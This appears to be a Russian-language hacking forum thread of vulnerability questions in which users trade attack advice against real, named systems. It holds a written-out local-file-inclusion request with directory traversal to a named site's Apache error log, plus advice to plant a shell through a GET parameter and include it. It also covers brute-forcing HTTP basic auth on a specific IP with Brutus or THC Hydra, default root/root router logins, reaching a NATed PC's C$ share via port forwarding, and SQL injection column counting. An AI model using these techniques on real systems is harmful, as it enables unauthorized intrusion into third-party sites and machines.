Ваши вопросы по уязвимостям.

смотри в файлах,
Просто в каждом браузере свой кэш.
а в IE прям как есть файл так и сохраняется.
ищи по swf

 

мне не файл нужно найти, мне нужен код (скорее всего на javascript) подгружающий флэшку не из инета, а из кэши браузера.

 

Такое невозможно)

 

название файла нужно знать и так же для определенного браузера свои методы загрузки из кэша

 

Вообще можно, но там то проверка на урл.

 

допустим название файла известно. Какие методы возможны в ИЕ, Фаерфокс или Опера???
Заранее благодарен.

 

Поодскажите плиз. в проге inetcrack в какое поле надо в писывать код чтобы инклудилось в еррор лог

вот исхлдное

Code:

GET http://ya.ru/ HTTP/1.1
Accept: */*
Accept-Language: ru
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 
98)
Host: ya.ru
Proxy-Connection: Keep-Alive

мой include вот http://www.holsteinworld.com/ontheroad/index.php?file=/../../../../../../../../../../../usr/local/apache2/logs/error_log

как составить помогите плиз.

 

в гет параметр воткни свой шелл, потом проинклудь и все будет окей
был бы файл access, там можно было бы подменить useragent таким же макаром.

кстати, не обязательно в данном случае использовать инеткрак или еще чего,для опыта делай просто через адресную строку

 

Code:

GET http://holsteinworld.com/ontheroad/index.php?file=/../../../../../../../../../../../usr/local/apache2/logs/error_log HTTP/1.1
Accept: */*
Accept-Language: ru
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 
98)
Host: holsteinworld.com
Proxy-Connection: Keep-Alive

 

как взломать пароль к системе вот переходиш по ссылке http://92.0.0.117/ и просит пароль , каким брутом можна подобрать?

 

любым брутом который брутит http basic авторизацию, даже можно старым добрым брутусом

 

Еще THC Hydra для линуска.

 

эм,
root
root
правда входишь в настройки свича, или что там такое стоит

 

Это adsl роутер-модем компа, который седит за NATом

 

ну так этож шикарно, и через него разве на комп низя попасть ? кстати если несложно либо тут в теме либо в ПМ скиньте потом как это можно сделать, если можно.
И заодно интерестно из него какую палезную инфу можно вытащить.
Все только ради интереса.

 

можно. надо сделать проброс портов на 445 и 139 tcp и 137 udp на 127.0.0.1

и зайти по адресуу в explorere \\92.0.0.117\c$

и мы можем попасть на диск C


//add

какойто урод конфиг щас поменял, что теперь не зайти

 

ну значит эти логин и пароль как раз то что и искал ben1991.

add ))
оперативно работают

 

Если открыт 445 порт то вам сюда >
https://forum.antichat.ru/thread99665.html

 

странно... через "ордер бай" выяснил то что 19 колонок... когда их все пишу:

выдаёт такую хрень!((
подозреваю что в версии MySQL трабла так?

 

F4R скорее всего union запрещен

если хочешь, кинь в личку ссылку гляну что там.